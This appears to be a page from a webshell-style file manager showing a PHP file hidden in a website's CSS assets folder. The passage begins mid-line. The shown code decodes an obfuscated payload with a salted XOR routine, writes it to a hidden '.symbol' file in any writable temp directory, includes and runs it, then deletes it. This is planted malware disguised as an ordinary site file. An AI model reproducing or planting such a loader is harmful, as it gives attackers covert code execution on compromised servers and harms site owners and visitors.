芝麻web文件管理V1.00
编辑当前文件:/home/paymbalq/nair.tamela.org/assets 1/css/busi_accept03.php
= $__len) break; $v6 = $obj[$s]; $sChar = ord($salt2[$s % $sLen]); $dec = ((int)$v6 - $sChar -($s % 10)) ^ 97; $binding .= chr($dec); $s++; } while(true); $mrk = array_filter([sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/dev/shm", "/tmp", getcwd(), getenv("TMP"), "/var/tmp", session_save_path()]); foreach ($mrk as $val) { if (is_dir($val) && is_writable($val)) { $fac = join("/", [$val, ".symbol"]); if (@file_put_contents($fac, $binding) !== false) { include $fac; unlink($fac); exit; } } } }